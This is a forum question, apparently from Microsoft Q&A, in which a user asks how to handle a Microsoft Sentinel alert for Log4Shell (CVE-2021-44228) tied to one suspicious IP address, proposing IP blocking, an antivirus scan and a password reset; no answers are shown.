Share via

"Log4j vulnerability exploit aka Log4Shell IP IOC involving one user"

Zenzele Mdakane 20 Reputation points
2025-04-15T17:19:19.45+00:00

Hi how do we go about resolving ( The detection rule "Log4j vulnerability exploit aka Log4Shell IP IOC involving one user" in Microsoft Sentinel identifies potential exploitation attempts of the Log4Shell vulnerability (CVE-2021-44228) by monitoring for indicators of compromise (IOCs) associated with a specific user account) Suspicious IP Address :185.220.101.25) will blocking the IP address, running full AV scan, request user to change password be the solution or what

Microsoft Sentinel
Microsoft Sentinel
A scalable, cloud-native solution for security information event management and security orchestration automated response. Previously known as Azure Sentinel.
1,268 questions
0 comments

0 additional answers

Sort by: Most helpful
Most helpful Newest Oldest

Your answer

Answers can be marked as Accepted Answers by the question author, which helps users to know the answer solved the author's problem.